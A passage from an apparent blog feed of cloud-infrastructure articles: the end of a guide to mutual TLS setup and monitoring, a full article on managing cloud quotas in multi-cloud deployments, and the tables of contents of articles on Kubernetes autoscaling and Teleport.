Layer 2: Product Service doesn't have certificates for Order Service or Payment Service
Layer 3: Product Service can't forge JWT tokens for users
Layer 4: Even if it could connect, authorization rules prevent it from accessing order data
Layer 5: Any suspicious behavior is logged and alerted

The compromise is contained to just the Product Service - the attacker can't pivot to sensitive financial data.

Why mTLS alone isn't enough:

mTLS proves service identity, but not user authorization
A compromised service with valid certificates could still abuse its access
Multiple layers provide redundancy - if one fails, others still protect you
Each layer addresses different threat vectors

This layered approach is the industry standard for securing cloud applications and is required for compliance with standards like PCI DSS, SOC 2, and HIPAA.

Getting Started: Step-by-Step

Step 1: Set Up a Certificate Authority

Choose between:

Cloud-native: AWS Private CA, GCP Certificate Authority Service, Azure Key Vault
Self-hosted: HashiCorp Vault, cert-manager (Kubernetes)
Managed service mesh: Istio CA, Linkerd CA

Step 2: Generate Certificates

For a service:

# Example: Generate a certificate request
openssl req -new -newkey rsa:2048 -nodes \
  -keyout service-a.key \
  -out service-a.csr \
  -subj "/CN=service-a.default.svc.cluster.local"

# Sign with CA
openssl x509 -req -in service-a.csr \
  -CA ca.crt -CAkey ca.key \
  -out service-a.crt -days 365

Step 3: Configure Your Services

Example Kubernetes configuration:

apiVersion: v1
kind: Secret
metadata:
  name: service-a-certs
type: kubernetes.io/tls
data:
  tls.crt: <base64-encoded-cert>
  tls.key: <base64-encoded-key>
  ca.crt: <base64-encoded-ca>

Step 4: Enable mTLS in Your Service Mesh

Example Istio configuration:

apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: default
spec:
  mtls:
    mode: STRICT  # Enforce mTLS for all services

Monitoring and Troubleshooting

Key Metrics to Monitor

Effective mTLS requires comprehensive monitoring. Here are the critical metrics organized by category:

Certificate Health Metrics - Proactive Monitoring:

M1: Days Until Expiration

Track how many days remain until each certificate expires
What to monitor: Minimum expiration time across all certificates
Why it matters: Prevents service outages from expired certificates
Alert threshold: Less than 7 days (highlighted in red)
Best practice: With 24-hour certificates, this should never trigger if auto-rotation works
Example alert: "Payment Service certificate expires in 6 days - rotation may be failing"

M2: Failed Validations

Count how many times certificate validation fails
What to monitor: Rate of validation failures per service
Why it matters: Indicates certificate issues, CA problems, or misconfiguration
Alert threshold: Any increase from baseline (orange alert)
Common causes: Clock skew, expired CA certificates, network issues reaching CA
Example: "User Service failing to validate Order Service certificate - CA unreachable"

M3: Rotation Success Rate

Percentage of successful certificate rotations
What to monitor: Success rate over time, broken down by service
Why it matters: Ensures automation is working properly
Target: Should be 99.9%+ for production systems
What can go wrong: CA outages, permission issues, secret store unavailable
Example: "Cart Service rotation success rate dropped to 95% - investigate"

Connection Metrics - Performance and Reliability:

M4: TLS Handshake Duration

Time taken to complete the mTLS handshake
What to monitor: P50, P95, P99 latency percentiles
Why it matters: Slow handshakes impact user experience
Typical values: 1-5ms for local services, 10-50ms for cross-region
Red flags: Sudden increases indicate CA problems or network issues
Example: "Handshake duration increased from 2ms to 50ms - CA performance degraded"

M5: Connection Failures

Number of failed mTLS connection attempts
What to monitor: Failure rate and absolute count
Alert threshold: Any spike above baseline (orange alert)
Why it matters: May indicate service outages, certificate problems, or attacks
Investigation steps: Check certificate validity, network connectivity, CA availability
Example: "100 failed connections to Payment Service in last 5 minutes - investigating"

M6: Certificate Errors

Specific types of certificate-related errors
What to monitor: Error categories (expired, invalid signature, wrong hostname, revoked)
Why it matters: Different errors require different fixes
Common errors:
- "Certificate expired": Rotation failed
- "Invalid signature": Certificate doesn't match CA
- "Hostname mismatch": Wrong certificate for this service
Example: "Payment Service receiving 'hostname mismatch' errors - certificate issued for wrong domain"

Security Metrics - Threat Detection:

M7: Unauthorized Access Attempts

Services or clients trying to connect without valid certificates
What to monitor: Source of attempts, target services, frequency
Alert threshold: Immediate alert (red - highest priority)
Why it matters: Indicates potential security breach or misconfiguration
Action required: Investigate immediately - could be an active attack
Example: "Unknown service attempting to connect to Payment Service - no valid certificate"

M8: Certificate Revocations

Certificates that have been revoked before expiration
What to monitor: Number and reason for revocations
Why it matters: Indicates security incidents or compromised services
Common reasons: Key compromise, service decommissioned, security policy violation
Example: "Cart Service certificate revoked due to suspected key exposure"

M9: Cipher Suite Usage

Which encryption algorithms are being used
What to monitor: Distribution of cipher suites across connections
Why it matters: Weak ciphers indicate security vulnerabilities
Best practice: Only allow TLS 1.3 with modern cipher suites
Red flags: TLS 1.0/1.1, weak ciphers like RC4 or 3DES
Example: "10% of connections using deprecated TLS 1.2 - update client configurations"

Setting Up Alerts - Priority Levels:

IMMEDIATE (Red):

Unauthorized access attempts (M7)
Security incidents requiring immediate response
Response time: Within minutes
Example action: Page security team, potentially block traffic

HIGH (Orange):

Certificate expiring in <7 days (M1)
Failed validations increasing (M2)
Connection failure spike (M5)
Response time: Within hours
Example action: Investigate root cause, trigger manual rotation if needed

MEDIUM (Yellow):

Rotation success rate dropping
Handshake duration increasing
Certificate errors appearing
Response time: Within business day
Example action: Review logs, identify configuration issues

Monitoring Tools:

Prometheus + Grafana: Popular open-source stack
Datadog / New Relic: Commercial APM solutions
Cloud-native: CloudWatch (AWS), Cloud Monitoring (GCP), Azure Monitor
Service mesh built-in: Istio, Linkerd provide metrics out-of-box

Dashboard Example:

A good mTLS dashboard shows:

Certificate expiration timeline (all certs visualized)
Connection success rate (should be >99.9%)
Handshake latency over time
Alert history and current active alerts
Per-service breakdown of all metrics

By monitoring these metrics, you can catch problems before they cause outages and detect security incidents in real-time.

Common Issues and Solutions

Issue: Certificate expired

Solution: Implement automated rotation with alerts 30 days before expiry

Issue: Certificate chain validation fails

Solution: Ensure CA certificate is properly distributed to all services

Issue: Performance degradation

Solution: Use session resumption, optimize cipher suites, consider hardware acceleration

Conclusion

Mutual TLS is no longer optional in modern cloud environments. It provides strong authentication, encryption, and forms the foundation of zero-trust architectures. While it adds complexity, cloud-native tools like service meshes and managed certificate authorities make implementation practical and manageable.

Start small: implement mTLS for your most sensitive service-to-service communications first, then gradually expand coverage as your team gains experience. The security benefits far outweigh the initial investment in setup and learning.

Additional Resources

Ready to implement mTLS in your cloud environment? Start by evaluating your current service-to-service communication patterns and identifying high-value targets for mTLS implementation.

Originally published at - https://platformwale.blog/

Navigating the Hidden Minefield: Cloud Quotas and Infrastructure Deployment Delays

Piyush Jajoo — Sun, 01 Feb 2026 15:27:58 +0000

Every cloud engineer has been there. Your infrastructure-as-code is perfect, your deployment pipeline is green, stakeholders are waiting, and then you hit the wall: "Quota exceeded for resource 'CPUS' in region 'us-east-1'." What should have been a 20-minute deployment turns into days of delays, escalations, and frantic quota requests. In multi-cloud environments, this problem multiplies exponentially.

The Real Cost of Quota Surprises

Quota limits are cloud providers' way of preventing runaway costs, abuse, and ensuring fair resource distribution. But when you're unprepared, they become deployment blockers that cascade through your entire delivery timeline. A quota issue isn't just a technical hiccup—it's a business risk that can derail product launches, delay critical features, and erode stakeholder confidence.

In single-cloud environments, this is manageable. In multi-cloud environments where you're orchestrating resources across AWS, Azure, and Google Cloud simultaneously, quota issues become a coordination nightmare. Each provider has different quota structures, request processes, and approval timelines.

Why Quota Issues Are Particularly Painful in Multi-Cloud

Multi-cloud strategies introduce several quota-related complications that single-cloud deployments don't face:

Different quota models across providers. AWS uses service quotas with soft and hard limits. Azure implements subscription-level quotas with regional variations. Google Cloud has project-level and per-region quotas. Each provider calculates resources differently—what counts as a single vCPU in AWS might be calculated differently in Azure.

Inconsistent approval timelines. AWS Service Quotas can sometimes be auto-approved for certain increases, taking minutes. Azure quota increases might require 24-48 hours. Google Cloud quota requests can take several business days depending on the resource type. When your deployment spans all three clouds, you're only as fast as the slowest approval.

Lack of unified visibility. There's no single pane of glass showing your quota utilization across clouds. You need separate monitoring for AWS Service Quotas, Azure subscription limits, and Google Cloud quotas. This fragmentation makes it nearly impossible to get a holistic view of your capacity headroom.

Regional fragmentation. Each cloud region has independent quotas. Your multi-cloud disaster recovery strategy might require deploying across six regions spanning three providers—that's 18+ different quota contexts to manage.

Common Quota Bottlenecks That Derail Deployments

Based on real-world experience, here are the quotas most likely to cause deployment delays:

Compute resources are the number one culprit. Standard vCPU quotas, spot instance limits, and GPU quotas frequently block deployments. A Kubernetes cluster expansion that needs 200 additional vCPUs can grind to a halt if you only have 50 vCPUs of quota headroom.

Networking quotas are often overlooked until it's too late. VPCs, subnets, elastic IPs, load balancers, NAT gateways, and VPN connections all have limits. In AWS, the default limit of 5 VPCs per region seems generous until you're implementing a hub-and-spoke network architecture.

Storage and database limits create bottlenecks for data-intensive applications. Provisioned IOPS limits, maximum volume sizes, snapshot quotas, and database instance counts can block deployments. Azure's limit on the number of storage accounts per subscription has caught many teams off guard.

API rate limits don't prevent deployment but slow it down significantly. When deploying hundreds of resources simultaneously, hitting API throttling limits can turn a 30-minute deployment into a 3-hour ordeal.

Specialized resources like dedicated hosts, reserved capacity, or specific instance families often have very low default quotas. If your workload requires GPU instances or high-memory instances, default quotas are rarely sufficient.

The Quota Request Process: Why Planning Matters

Understanding the typical quota increase workflow reveals why preparation is critical. Most quota requests follow this pattern: identify the bottleneck (often during a failed deployment), determine the required quota, submit a request through the provider's support system, wait for human review and approval, and finally retry the deployment. This process typically takes 2-5 business days minimum.

For critical or large quota increases, providers may require business justification, architecture reviews, or proof of legitimate use cases. Some increases require escalation to account managers. In multi-cloud scenarios, you're running this process in parallel across multiple providers, each with their own bureaucracy.

The worst-case scenario happens during critical incidents or time-sensitive launches. When your production environment needs emergency scaling, quota limits don't care about your urgency. By then, it's too late.

Building a Proactive Quota Management Strategy

The solution is shifting from reactive firefighting to proactive capacity planning. Successful multi-cloud teams implement these practices:

Maintain a quota inventory. Create a centralized spreadsheet or database tracking current quotas, current utilization, and headroom for every critical resource type across all regions and providers. Update this monthly at minimum. Include the last increase date and approval contact for each quota.

Forecast based on deployment patterns. Analyze your infrastructure-as-code repositories to understand typical deployment sizes. If your Kubernetes clusters always scale to 50 nodes, ensure you have quota for 75+ nodes to provide buffer. Map your application architecture to required quotas—a typical microservices deployment might need X vCPUs, Y load balancers, and Z database instances.

Request quotas before you need them. When planning a new project or feature, audit the quota requirements during the design phase. Submit quota increase requests at the beginning of the sprint, not the end. Build a 2-week buffer for quota approvals into your project timelines.

Implement automated quota monitoring. Use cloud provider APIs to programmatically check quota utilization. Set up alerts when utilization exceeds 70% of any critical quota. Tools like AWS Trusted Advisor, Azure Advisor, and Google Cloud Recommender provide some of this functionality, but custom automation gives you multi-cloud visibility.

Establish quota request templates. Standardize your quota increase requests with clear business justifications, expected usage patterns, and rollout timelines. Having pre-approved templates for common scenarios speeds up future requests. Build relationships with your technical account managers or cloud support contacts before you need emergency help.

Design with quotas in mind. Your architecture should consider quota constraints. Instead of deploying everything to us-east-1, distribute workloads across regions. Use resource tagging to track which resources belong to which projects, making it easier to forecast quota needs. Implement gradual rollouts that won't hit quotas all at once.

Practical Example: Deploying a Multi-Region Application

Consider deploying a containerized application across AWS and Google Cloud with active-active configuration. Here's what proactive quota management looks like:

During the planning phase, you identify requirements: 3 Kubernetes clusters (2 in AWS, 1 in GCP), 120 total vCPUs, 6 load balancers, 3 NAT gateways, 15 persistent volumes, and 3 managed databases. You map this to specific quotas: AWS EC2 vCPU limits in us-east-1 and eu-west-1, AWS VPC limits, AWS RDS instance quotas, GCP compute instance quotas in us-central1, GCP load balancer forwarding rules, and GCP persistent disk quotas.

Two weeks before deployment, you audit current quotas and utilization. You discover that AWS us-east-1 has only 80 vCPUs of headroom—insufficient. AWS eu-west-1 is fine. GCP us-central1 has adequate quota. You immediately submit a request for 200 additional vCPUs in AWS us-east-1 with business justification explaining the production deployment timeline.

One week before deployment, you verify that AWS approved the quota increase. All quotas now have at least 25% headroom above requirements. On deployment day, everything succeeds without quota-related failures. The rollout completes in 45 minutes instead of being blocked for days.

Multi-Cloud Quota Monitoring Tools and Approaches

While no perfect solution exists for unified multi-cloud quota management, several approaches can help. Cloud provider native tools like AWS Service Quotas console, Azure subscription blade, and Google Cloud IAM quotas page provide per-provider visibility. Custom scripting with provider APIs can aggregate quota data into a central dashboard—AWS boto3, Azure SDK, and Google Cloud Client Libraries all expose quota information programmatically.

Third-party cloud management platforms like CloudHealth, Flexera, or Spot.io offer some multi-cloud quota visibility as part of broader cost management features. Infrastructure-as-code tools can be extended—Terraform, Pulumi, or CloudFormation can validate quota availability before deployment attempts. Some teams build pre-deployment validation scripts that check quota headroom before running terraform apply.

Implementing a lightweight quota dashboard that polls each cloud provider daily and tracks utilization trends is often the most practical approach for mid-sized teams.

Making Quota Management Part of Your Culture

Beyond tools and processes, successful quota management requires cultural change. Treat quota planning as seriously as capacity planning—it's part of ensuring reliability and availability. Make quota reviews a standard checkpoint in architecture reviews and deployment runbooks. Include quota requirements in infrastructure documentation and runbook templates.

Train your teams to understand quota concepts and encourage them to think about quotas during design, not during deployment. Create postmortems for quota-related incidents and use them as learning opportunities. Celebrate when proactive quota management prevents a potential outage or delay.

Conclusion: Quotas as Capacity Planning, Not Roadblocks

Cloud quotas aren't arbitrary restrictions—they're capacity management tools that, when handled proactively, become invisible. In single-cloud environments, quota management is straightforward. In multi-cloud environments, it requires deliberate strategy, automated monitoring, and organizational discipline.

The teams that succeed in multi-cloud deployments are those who treat quotas as first-class concerns in their infrastructure planning. They forecast needs, request headroom in advance, monitor continuously, and build quota awareness into their deployment culture. The alternative is accepting that every major deployment carries the risk of multi-day delays due to something entirely preventable.

Start today by auditing your current quotas across all providers. Identify which resources are running close to limits. Submit proactive increase requests for anything above 70% utilization. Build monitoring for critical quotas. The next time you need to deploy infrastructure at scale, you'll be grateful you did.

Your infrastructure code might be perfect, but if you don't have the quota to run it, it might as well be broken. In multi-cloud environments, quota management isn't optional—it's the difference between smooth deployments and costly delays.

Originally published at - https://platformwale.blog/

DEV Community: Piyush Jajoo

Kubernetes Autoscaling Internals: HPA and VPA Under the Hood

Table of Contents

Prerequisites: Setting Up Your Lab Cluster

Autoscaling Is a Multi-Loop System

The Problem Space

Horizontal Pod Autoscaler (HPA)

The Control Loop

HPA as a Delayed, Saturating P-Controller

The End-to-End Reaction Time

🧪 Exercise 1: Observe the HPA Reaction Time Pipeline

The Scaling Algorithm

🧪 Exercise 2: Verify the Stabilization Window During Scale-Down

Multi-Metric Behavior

CPU vs. External Metrics: An Explicit Tradeoff

HPA v2 Scaling Policies

🧪 Exercise 3: Observe Unconstrained vs. Rate-Limited Scale-Out

The CPU Request Coupling Problem (Why VPA Breaks CPU HPA)

🧪 Exercise 4: Demonstrate CPU Request Coupling

Metrics Pipeline

Scale-to-Zero

Vertical Pod Autoscaler (VPA)

Architecture: Three Separate Components

🧪 Exercise 5: Install VPA and Observe Recommendations

The Recommender: Statistical Core

The Updater: The Disruptive Actor

🧪 Exercise 6: Observe VPA Auto Mode and the PDB Blocker

The Admission Controller: The Mutation Point

🧪 Exercise 7: Confirm the Admission Webhook Mutation

HPA vs VPA: When to Use Which

🧪 Exercise 8: Reproduce the HPA + VPA Feedback Loop

Cluster Autoscaler Interaction

🧪 Exercise 9: Trigger Pending Pods via VPA Request Inflation

Operational Gotchas

🧪 Exercise 10: Inspect VPA Recommendations Under CPU Throttling

Autoscaling Failure Taxonomy

Production Incident Pattern: The Black Friday Failure Mode

🧪 Exercise 11: Simulate the Black Friday Failure Mode End-to-End

Choosing an Autoscaling Strategy

Production Design Pattern: A Battle-Tested Reference Architecture

Cost Dynamics of Autoscaling

What Experienced Engineers Actually Do

Common Misconfigurations

HPA Anti-Patterns

VPA Anti-Patterns

Observability: Metrics That Matter

🧪 Exercise 12: Interrogate HPA Status Conditions

Final Cleanup

Summary

HPA Signal Tradeoff: CPU vs. External Metrics

HPA vs. VPA at a Glance

Full Reference

How Teleport Works: A Deep Dive into Modern Infrastructure Access

Table of Contents

Introduction

The Core Problem Teleport Solves

Teleport vs VPN vs Bastion Hosts

VPN Model

Bastion Host Model

Teleport Model (Zero Trust Access Plane)

Quick Comparison Table

Fundamental Architecture Concepts

Non-Obvious Insight: Teleport Shifts the Trust Boundary

The Cluster: Foundation of Teleport's Security Model

Certificate-Based Authentication: The Heart of Teleport

Short-Lived Certificates and Zero Standing Privileges

Secure Node Enrollment (Join Tokens)

Teleport Architecture Deep Dive

Control Plane vs Traffic Plane Separation

Core Components

1. Auth Service: The Certificate Authority

2. Proxy Service: The Access Gateway

3. Teleport Agents: Protocol-Specific Services

Unified Resource Inventory and Discovery

Advanced Features

Role-Based Access Control (RBAC)

Access Requests: Just-In-Time Privilege Escalation

Session Recording and Playback

Session Moderation and Shared Access

Device Trust and Hardware Security